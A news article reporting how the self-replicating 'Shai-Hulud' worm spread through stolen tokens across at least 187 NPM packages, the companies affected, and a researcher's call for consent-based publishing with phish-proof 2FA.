Self-Replicating Malware 'Shai-Hulud' Infects 187 NPM Packages, Compromising Credentials
The NPM registry, a vital hub for JavaScript developers, is contending with a self-replicating malware, dubbed Shai-Hulud. This worm has infiltrated at least 187 packages, compromising maintainer accounts and stealing credentials. The attack commenced days after a phishing campaign targeting NPM developers.
The Shai-Hulud worm propagates by exploiting stolen NPM authentication tokens. It introduces its malicious code to the top 20 packages in a victim's account, causing a cascading effect. The worm can lie dormant and restart the spread if just one person is suddenly infected, especially in super-spreader attacks. The malware, once inside a package, copies itself into the 20 most popular packages the developer has access to and publishes new versions.
The attack has had substantial impact. CrowdStrike, for instance, had at least 25 of its NPM code packages compromised, which were swiftly removed by the NPM registry. Davies Meyer, another company, had at least 25 npm packages affected, with high-traffic packages like @ctrl/tinycolor compromised. The worm uses TruffleHog to search for exposed credentials and access tokens on the developer's machine, and attempts to create new GitHub actions to publish any stolen secrets.
The Shai-Hulud attack underscores the urgent need for enhanced security measures in the NPM ecosystem. Nicholas Weaver, a researcher with the International Computer Science Institute, recommends transitioning to a publication model that necessitates explicit human consent for every publication request using a phish-proof 2FA method. CrowdStrike has taken steps to mitigate the issue, removing malicious packages and rotating its keys in public registries. However, the full extent of the damage and the number of affected packages remain under investigation.
Read also:
- Belarus Launches First Accredited Cybersecurity Center
- Bridge the IT-Security Divide with Qualys VMDR for ITSM: A New Application to Streamline Your IT and Security Operations
- Italy passes AI legislation addressing privacy concerns, supervision, and kid-safe access
- East Asian countries should be cautious, as scamming operations are moving towards the region - it's high time we stay vigilant. - Phar Kim Beng
